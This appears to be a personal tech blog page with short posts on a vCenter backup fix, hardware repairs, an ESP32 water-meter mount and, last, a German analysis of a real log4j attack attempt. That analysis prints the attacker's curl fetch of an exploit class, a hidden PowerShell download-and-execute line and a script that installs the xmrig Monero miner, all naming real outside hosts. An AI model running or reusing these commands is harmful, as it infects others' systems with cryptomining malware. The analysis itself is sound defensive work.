All posts by Stefan

VMware vCenter: SCP Backup does not work

Recently we changed the backup Server for our vCenter. The backup job over SCP worked for years on the old Server, but on the new one I was not able to configure the backup-schedule. I got always a timeout on the vCenter Server Appliance Management Web-GUI and I had to restart it with:

service-control --restart applmgmt

To get it working again without rebooting the whole vCenter Appliance.

After a few hours of debugging, I saw a process named sshpass which was hanging.
sshpass tries to find “Password:” in the prompt and sends then the password.

Now the problem was, the old Server had a prompt like:

Password:

And the new one had:

Password for username@servername:

So sshpass was not able to find “Password:” and timed out.

As both our servers are BSD, I had to fix the sshd config on the new Server for PAM in /etc/pam.d/sshd with adding of “authtok_prompt=Password:” and then restart sshd.

#auth required pam_unix.so no_warn try_first_pass
auth required pam_unix.so no_warn try_first_pass authtok_prompt=Password:

With this setting, the prompt changes from “Password for ….” to “Password:”.
And the backup-schedule works again ­čÖé

Wasserz├Ąhler auslesen

Dieses coole Projekt hat mir geholfen, endlich meinen Wasserz├Ąhler auszulesen:
https://jomjol.github.io/AI-on-the-edge-device-docs/

Hier stelle ich meinen 3d Druck zur Verf├╝gung, um das ESP32-CAM Modul direkt auf einen Neovac Deckel zu montieren.

Beim Neovac den blauen Deckel abmontieren und dann den weissen Einsatz entfernen. Der untere Zylinder wird dann neu anstelle des weissen Einsatzes eingeklemmt. Der Deckel als Halterung f├╝r den ESP32 wird dann einfach ├╝ber den Zylinder gest├╝lpt und seitlich mit einer Schraube fixiert. Auf dem ESP32-CAM muss der Fokus angepasst werden.

Reparatur Novamatic LCD

Wir haben vor ca. 5 Jahren eine K├╝hl-Gefrierschrank Kombination von Novamatic gekauft, Typ KS-TF 326-IB. Nach etwas mehr als 2 Jahren ging die 7-Segment LCD-Anzeige nicht mehr.

Nat├╝rlich war die Garantie abgelaufen. Meiner Meinung nach handelt es sich hier um eine Fehlkonstruktion, man k├Ânnte es auch “Sollbruchstelle” nennen. Genau dort wo die Litzen vom ├ľffnen/Schliessen immer gebogen werden, ist kein Schutz vorhanden.

Da die Zeit gekommen ist um Strom zu sparen, habe ich mir heute endlich Zeit genommen den Defekt zu reparieren, damit ich die Temperatur im K├╝hlschrank wieder sehen und einstellen kann.

In der Explosionszeichnung handelt es sich um das Kabel an Position 77:

Continue reading Reparatur Novamatic LCD

Nintendo Game Boy ohne Sound

Ich habe einen als defekt deklarierten Game Boy DMG-01 erworben, der Verk├Ąufer gab an dass kein Sound mehr vorhanden ist. Als erstes hab ich heute die Kopfh├Ârerbuchse getestet, welche zu meiner ├ťberraschung noch funktioniert. Also kein allgemeiner Defekt dass kein Sound mehr vorhanden w├Ąre. Danach habe ich den Game Boy aufgeschraubt und das Problem sofort entdeckt:

Wie man sieht hat hier schon jemand versucht zu reparieren. Die Platine ist gebrochen, den Speaker und die abgerissenen Dr├Ąhte habe ich bereits ausgel├Âtet.

Continue reading Nintendo Game Boy ohne Sound

Ein log4j Angriff (CVE-2021-44228)

Hier ein Beispiel eines log4j Angriffs auf ein nicht verwundbares System.
Folgender Log-Eintrag war auf einem Apache-Webserver zu finden:

Was macht der? Sollte dahinter eine Java Applikation laufen welche die log4j Komponente nutzt, so w├╝rde die Datei “Exploit” geladen und ausgef├╝hrt.

Wir holen uns mal die Datei:

curl ldap://185.246.87.50:1389/Exploit.class -o Exploit.class

Mit dem Reverse-Engineering Tool namens jadx-gui sehen wir uns die Java-Klasse an, darin finden wir u.A. folgenden Windows Powershell Befehl, welcher bei einer Windows-Umgebung ausgef├╝hrt wird:

if (System.getProperty("os.name").toLowerCase().startsWith("win")) {
 Runtime.getRuntime().exec(new String[]{"powershell", "-w", "hidden", "-c", "(new-object System.Net.WebClient).DownloadFile('http://150.60.139.51:80/wp-content/themes/twentyseventeen/s.cmd', $env:temp + '/s.cmd');start-process -FilePath 's.cmd' -WorkingDirectory $env:tmp"});
}

Dieses l├Ądt die s.cmd von einer eventuell gehackten WordPress-Seite herunter und f├╝hrt diese aus. In der Datei s.cmd steht folgendes:

powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://68.183.165.105:80/wp-content/themes/twentyseventeen/xmrig64.exe','xmrig.exe')
xmrig.exe -o pool.supportxmr.com:5555 -u 46QBumovWy4dLJ4R8wq8JwhHKWMhCaDyNDEzvxHFmAHn92EyKrttq6LfV6if5UYDAyCzh3egWXMhnfJJrEhWkMzqTPzGzsE -p log

Wenn s.cmd ausgef├╝hrt wird, wird der Monero-Miner xmrig64.exe wiederum von einer WordPress-Seite heruntergeladen und ausgef├╝hrt. Die Monero-Adresse lautet: 46QBumovWy4dLJ4R8wq8JwhHKWMhCaDyNDEzvxHFmAHn92EyKrttq6LfV6if5UYDAyCzh3egWXMhnfJJrEhWkMzqTPzGzsE und nutzt den Miner-Pool von supportxmr.com.

Gucken wir da doch mal rein ob es sich lohnt:

Der Erfolg h├Ąlt sich in Grenzen. Als ich das erste Mal rein geschaut habe war noch eine Hashrate von 12KH/s aktiv, jetzt ist sie auf einen Durchschnitt von 4.7KH/s runter gefallen, was wohl darauf hindeutet dass die meisten Miner entdeckt und gel├Âscht wurden. 4.7KH/s schafft man laut XMR CPU Benchmarks mit einem aktuellen Intel i7 oder Ryzen 7 Prozessor.

Ausbezahlt wurden bisher 0.08418 XMR, das sind momentan rund 18.90 US-Dollar.
Nehmen wir an der oder die Hacker haben nur diese XMR-Adresse genutzt, so scheint es sich nicht zu lohnen. Ich gehe aber mal davon aus dass verschiedene Angriffe und Adressen genutzt wurden.